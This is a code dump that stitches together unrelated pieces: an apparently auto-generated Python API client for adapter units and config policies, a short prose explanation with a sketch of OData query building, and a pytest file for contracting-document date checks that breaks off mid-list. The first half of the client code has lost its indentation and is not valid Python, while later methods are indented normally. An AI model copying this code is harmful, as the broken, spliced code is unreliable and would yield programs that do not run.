:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: if True, return the response data only,
                               without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
                         single number is provided, it is used as the
                         total request timeout. It can also be a pair
                         (tuple) of (connection, read) timeouts.
:return: tuple(AdapterHostIscsiInterfaceList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_host_iscsi_interface_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/HostIscsiInterfaces',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterHostIscsiInterfaceList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_unit_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'adapter.Unit' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_unit_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
                         single number is provided, it is used as the
                         total request timeout. It can also be a pair
                         (tuple) of (connection, read) timeouts.
:return: AdapterUnit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_unit_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_adapter_unit_by_moid_with_http_info(self, moid,
**kwargs): # noqa: E501
"""Read a 'adapter.Unit' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_unit_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: if True, return the response data only,
                               without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
                         single number is provided, it is used as the
                         total request timeout. It can also be a pair
                         (tuple) of (connection, read) timeouts.
:return: tuple(AdapterUnit, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_adapter_unit_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_adapter_unit_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/Units/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterUnit', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_unit_list(self, **kwargs): # noqa: E501
"""Read a 'adapter.Unit' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_unit_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
                         single number is provided, it is used as the
                         total request timeout. It can also be a pair
                         (tuple) of (connection, read) timeouts.
:return: AdapterUnitList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_unit_list_with_http_info(**
kwargs) # noqa: E501
def get_adapter_unit_list_with_http_info(self, **kwargs): # noqa: E501
"""Read a 'adapter.Unit' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_unit_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: if True, return the response data only,
                               without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a
                         single number is provided, it is used as the
                         total request timeout. It can also be a pair
                         (tuple) of (connection, read) timeouts.
:return: tuple(AdapterUnitList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_adapter_unit_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/Units',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterUnitList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
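    # Usage sketch: listing 'adapter.Unit' resources with OData-style query
    # options. Assumes `api` is an authenticated instance of this API class;
    # property names in the filter/orderby strings are illustrative, and the
    # returned AdapterUnitList is assumed to expose its page via `.results`.
    #
    #   units = api.get_adapter_unit_list(top=5, orderby='Dn')
    #   for unit in units.results:
    #       print(unit.moid)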

    def patch_adapter_config_policy(self, moid, adapter_config_policy,
                                    **kwargs):  # noqa: E501
        """Update an 'adapter.ConfigPolicy' resource.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.patch_adapter_config_policy(moid, adapter_config_policy, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str moid: The unique Moid identifier of a resource instance. (required)
        :param AdapterConfigPolicy adapter_config_policy: The 'adapter.ConfigPolicy' resource to update. (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: AdapterConfigPolicy
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.patch_adapter_config_policy_with_http_info(
            moid, adapter_config_policy, **kwargs)  # noqa: E501

    def patch_adapter_config_policy_with_http_info(self, moid,
                                                   adapter_config_policy,
                                                   **kwargs):  # noqa: E501
        """Update an 'adapter.ConfigPolicy' resource.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.patch_adapter_config_policy_with_http_info(moid, adapter_config_policy, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str moid: The unique Moid identifier of a resource instance. (required)
        :param AdapterConfigPolicy adapter_config_policy: The 'adapter.ConfigPolicy' resource to update. (required)
        :param _return_http_data_only: response data without HTTP status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(AdapterConfigPolicy, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['moid', 'adapter_config_policy']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'"
                                   " to method patch_adapter_config_policy" %
                                   key)
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'moid' is set
        if self.api_client.client_side_validation and (
                'moid' not in local_var_params or  # noqa: E501
                local_var_params['moid'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `moid` when calling `patch_adapter_config_policy`"
            )  # noqa: E501
        # verify the required parameter 'adapter_config_policy' is set
        if self.api_client.client_side_validation and (
                'adapter_config_policy' not in local_var_params
                or  # noqa: E501
                local_var_params['adapter_config_policy'] is None
        ):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `adapter_config_policy` when calling `patch_adapter_config_policy`"
            )  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'moid' in local_var_params:
            path_params['Moid'] = local_var_params['moid']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'adapter_config_policy' in local_var_params:
            body_params = local_var_params['adapter_config_policy']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params[
            'Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
                ['application/json',
                 'application/json-patch+json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501

        return self.api_client.call_api(
            '/adapter/ConfigPolicies/{Moid}',
            'PATCH',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='AdapterConfigPolicy',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def update_adapter_config_policy(self, moid, adapter_config_policy,
                                     **kwargs):  # noqa: E501
        """Update an 'adapter.ConfigPolicy' resource.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.update_adapter_config_policy(moid, adapter_config_policy, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str moid: The unique Moid identifier of a resource instance. (required)
        :param AdapterConfigPolicy adapter_config_policy: The 'adapter.ConfigPolicy' resource to update. (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: AdapterConfigPolicy
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.update_adapter_config_policy_with_http_info(
            moid, adapter_config_policy, **kwargs)  # noqa: E501

    def update_adapter_config_policy_with_http_info(self, moid,
                                                    adapter_config_policy,
                                                    **kwargs):  # noqa: E501
        """Update an 'adapter.ConfigPolicy' resource.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.update_adapter_config_policy_with_http_info(moid, adapter_config_policy, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str moid: The unique Moid identifier of a resource instance. (required)
        :param AdapterConfigPolicy adapter_config_policy: The 'adapter.ConfigPolicy' resource to update. (required)
        :param _return_http_data_only: response data without HTTP status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(AdapterConfigPolicy, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['moid', 'adapter_config_policy']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'"
                                   " to method update_adapter_config_policy" %
                                   key)
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'moid' is set
        if self.api_client.client_side_validation and (
                'moid' not in local_var_params or  # noqa: E501
                local_var_params['moid'] is None):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `moid` when calling `update_adapter_config_policy`"
            )  # noqa: E501
        # verify the required parameter 'adapter_config_policy' is set
        if self.api_client.client_side_validation and (
                'adapter_config_policy' not in local_var_params
                or  # noqa: E501
                local_var_params['adapter_config_policy'] is None
        ):  # noqa: E501
            raise ApiValueError(
                "Missing the required parameter `adapter_config_policy` when calling `update_adapter_config_policy`"
            )  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'moid' in local_var_params:
            path_params['Moid'] = local_var_params['moid']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'adapter_config_policy' in local_var_params:
            body_params = local_var_params['adapter_config_policy']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params[
            'Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
                ['application/json',
                 'application/json-patch+json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['cookieAuth', 'oAuth2']  # noqa: E501

        return self.api_client.call_api(
            '/adapter/ConfigPolicies/{Moid}',
            'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='AdapterConfigPolicy',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get(
                '_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
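The generated client above assembles OData-style query parameters (`$select`, `$expand`, `$apply`, `$count`, `$inlinecount`, `at`) by appending a `(name, value)` pair only when the caller actually supplied that option. A minimal self-contained sketch of the same pattern, with no Intersight SDK dependency (the function name and option map here are illustrative, not part of the generated API):

```python
from urllib.parse import urlencode


def build_odata_query(params):
    """Map caller-supplied options to OData query parameters, skipping None."""
    odata_names = {
        'select': '$select',
        'expand': '$expand',
        'apply': '$apply',
        'count': '$count',
        'inlinecount': '$inlinecount',
        'at': 'at',
    }
    query_params = []
    for key, odata_key in odata_names.items():
        # Mirror the generated guard: the key must be present and not None.
        if key in params and params[key] is not None:
            query_params.append((odata_key, params[key]))
    return query_params


# Unknown options ('top' here) and None values are simply ignored.
query = build_odata_query({'select': 'Moid,Model', 'count': True,
                           'expand': None, 'top': 10})
print(urlencode(query))
```

The list-of-pairs form (rather than a dict) matches how the generated code hands `query_params` to `call_api`, which URL-encodes them downstream.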
# File: tests/compiled_release/coherent/test_documents_dates.py
# Repo: open-contracting/pelican-backend (license: BSD-3-Clause)
from contracting_process.resource_level.coherent.documents_dates import calculate


def test_undefined():
    empty_result = calculate({})
    assert type(empty_result) == dict
    assert empty_result["result"] is None
    assert empty_result["application_count"] is None
    assert empty_result["pass_count"] is None
    assert empty_result["meta"] == {"reason": "insufficient data for check"}


item_ok = {
    "date": "2019-12-31T00:00:00Z",
    "planning": {
        "documents": [
            {
                "datePublished": "2014-12-31T00:00:00Z",
                "dateModified": "2015-12-31T00:00:00Z",
            },
            {
                "datePublished": "2014-12-31T00:00:00Z",
                "dateModified": "2015-12-31T00:00:00Z",
            },
        ]
    },
    "tender": {
        "documents": [
            {
                "datePublished": "2014-12-31T00:00:00Z",
                "dateModified": "2015-12-31T00:00:00Z",
            }
        ]
    },
    "awards": [
        {
            "documents": [
                {
                    "datePublished": "2014-12-31T00:00:00Z",
                    "dateModified": "2015-12-31T00:00:00Z",
                }
            ]
        }
    ],
    "contracts": [
        {
            "documents": [
                {
                    "datePublished": "2014-12-31T00:00:00Z",
                    "dateModified": "2015-12-31T00:00:00Z",
                }
            ]
        },
        {
            "implementation": {
                "documents": [
                    {
                        "datePublished": "2014-12-31T00:00:00Z",
                        "dateModified": "2015-12-31T00:00:00Z",
                    }
                ]
            }
        },
    ],
}


def test_ok():
    result = calculate(item_ok)
    assert type(result) == dict
    assert result["result"] is True
    assert result["application_count"] == 18
    assert result["pass_count"] == 18
    assert result["meta"] is None


item_failed = {
    "date": "2010-12-31T00:00:00Z",
    "planning": {
        "documents": [
            {
                "datePublished": "2030-12-31T00:00:00Z",
                "dateModified": "2020-12-31T00:00:00Z",
            },
            {
                "datePublished": "2030-12-31T00:00:00Z",
                "dateModified": "2020-12-31T00:00:00Z",
            },
        ]
    },
    "tender": {
        "documents": [
            {
                "datePublished": "2030-12-31T00:00:00Z",
                "dateModified": "2020-12-31T00:00:00Z",
            }
        ]
    },
    "awards": [
        {
            "documents": [
                {
                    "datePublished": "2030-12-31T00:00:00Z",
                    "dateModified": "2020-12-31T00:00:00Z",
                }
            ]
        }
    ],
    "contracts": [
        {
            "documents": [
                {
                    "datePublished": "2030-12-31T00:00:00Z",
                    "dateModified": "2020-12-31T00:00:00Z",
                }
            ]
        },
        {
            "implementation": {
                "documents": [
                    {
                        "datePublished": "2030-12-31T00:00:00Z",
                        "dateModified": "2020-12-31T00:00:00Z",
                    }
                ]
            }
        },
    ],
}


def test_failed():
    result = calculate(item_failed)
    assert type(result) == dict
    assert result["result"] is False
    assert result["application_count"] == 18
    assert result["pass_count"] == 0
    assert result["meta"] == {
        "failed_paths": [
            {
                "path_1": "planning.documents[0].datePublished",
                "path_2": "planning.documents[0].dateModified",
                "value_1": "2030-12-31T00:00:00Z",
                "value_2": "2020-12-31T00:00:00Z",
            },
            {
                "path_1": "planning.documents[0].datePublished",
                "path_2": "date",
                "value_1": "2030-12-31T00:00:00Z",
                "value_2": "2010-12-31T00:00:00Z",
            },
            {
                "path_1": "planning.documents[0].dateModified",
                "path_2": "date",
                "value_1": "2020-12-31T00:00:00Z",
                "value_2": "2010-12-31T00:00:00Z",
            },
            {
                "path_1": "planning.documents[1].datePublished",
                "path_2": "planning.documents[1].dateModified",
                "value_1": "2030-12-31T00:00:00Z",
                "value_2": "2020-12-31T00:00:00Z",
            },
            {
                "path_1": "planning.documents[1].datePublished",
                "path_2": "date",
                "value_1": "2030-12-31T00:00:00Z",
                "value_2": "2010-12-31T00:00:00Z",
            },
            {
                "path_1": "planning.documents[1].dateModified",
                "path_2": "date",
                "value_1": "2020-12-31T00:00:00Z",
                "value_2": "2010-12-31T00:00:00Z",
            },
            {
                "path_1": "tender.documents[0].datePublished",
                "path_2": "tender.documents[0].dateModified",
                "value_1": "2030-12-31T00:00:00Z",
                "value_2": "2020-12-31T00:00:00Z",
            },
            {
                "path_1": "tender.documents[0].datePublished",
                "path_2": "date",
                "value_1": "2030-12-31T00:00:00Z",
                "value_2": "2010-12-31T00:00:00Z",
            },
            {
                "path_1": "tender.documents[0].dateModified",
                "path_2": "date",
                "value_1": "2020-12-31T00:00:00Z",
                "value_2": "2010-12-31T00:00:00Z",
            },
            {
                "path_1": "awards[0].documents[0].datePublished",
                "path_2": "awards[0].documents[0].dateModified",
                "value_1": "2030-12-31T00:00:00Z",
                "value_2": "2020-12-31T00:00:00Z",
            },
            {
